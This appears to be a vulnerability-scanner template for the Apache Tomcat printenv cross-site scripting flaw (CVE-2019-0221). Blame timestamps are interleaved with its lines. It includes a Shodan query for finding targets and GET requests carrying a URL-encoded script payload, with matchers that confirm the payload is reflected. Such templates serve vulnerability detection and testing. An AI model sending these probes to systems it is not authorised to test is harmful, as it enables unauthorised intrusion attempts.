2021-03-05 14:38:39 +00:00
id : CVE-2019-0221
info :
2022-08-12 00:45:50 +00:00
name : Apache Tomcat - Cross-Site Scripting
2021-03-05 14:38:39 +00:00
author : pikpikcu
2021-09-10 11:26:40 +00:00
severity : medium
2021-03-05 14:38:39 +00:00
description : |
2022-08-12 00:45:50 +00:00
Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note : SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.
2022-04-22 10:38:41 +00:00
reference :
- https://seclists.org/fulldisclosure/2019/May/50
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
- https://www.exploit-db.com/exploits/50119
2022-05-17 09:18:12 +00:00
- https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c@%3Cannounce.tomcat.apache.org%3E
2022-08-12 00:45:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-0221
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-0221
cwe-id : CWE-79
2022-07-04 13:18:48 +00:00
metadata :
shodan-query : title:"Apache Tomcat"
2022-08-27 04:41:18 +00:00
tags : apache,xss,tomcat,seclists,edb,cve,cve2019
2021-03-05 14:38:39 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
2021-08-01 02:43:53 +00:00
- "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
2021-03-05 14:38:39 +00:00
matchers-condition : and
matchers :
- type : word
words :
- "<script>alert('xss')</script>"
2021-03-06 05:58:28 +00:00
- type : word
2021-12-29 13:40:59 +00:00
part : header
2021-03-06 05:58:28 +00:00
words :
- "text/html"
2021-03-05 14:38:39 +00:00
- type : status
status :
- 200
2022-08-12 00:45:50 +00:00
# Enhanced by mp on 2022/08/11